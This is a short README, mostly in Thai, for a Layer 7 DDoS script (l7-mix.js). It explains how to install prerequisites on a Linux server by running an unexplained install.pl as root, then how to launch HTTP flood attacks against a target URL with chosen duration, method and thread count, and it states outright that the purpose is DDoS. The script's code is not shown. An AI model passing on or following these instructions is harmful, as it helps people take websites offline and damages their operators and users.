ลงโปรแกรมที่จำเป็นก่อนใช้
1.รีโมท linux
2.นำไฟล์ install.pl อัพลงหน้า root ของ linux
3 พิมคำสั่ง apt install perl
4 พิมคำสั่ง perl install.pl



วิธีใช้งาน
1.รีโมท linux
2.นำไฟล์ l7-mix.js อัพลงหน้า root ของ linux
3. พิมพ์คำสั่ง  node /root/l7-mix.js https://domain.com 120 REQ 5 
เพื่อใช้งาน ddos (กด ctrl+c เพื่อยกเลิก)
.
.

Usage: node /root/l7-mix.js <url> <time> <method> <threads>
    Methods : [HTTP/1, HTTP/1-TH, HTTP/2, HTTP/2-TH, REQ]
        Layer7 Scripts version 1.0.1
        Cr. Modify : Cho Doser
        Facebook : https://www.facebook.com/chodoser/
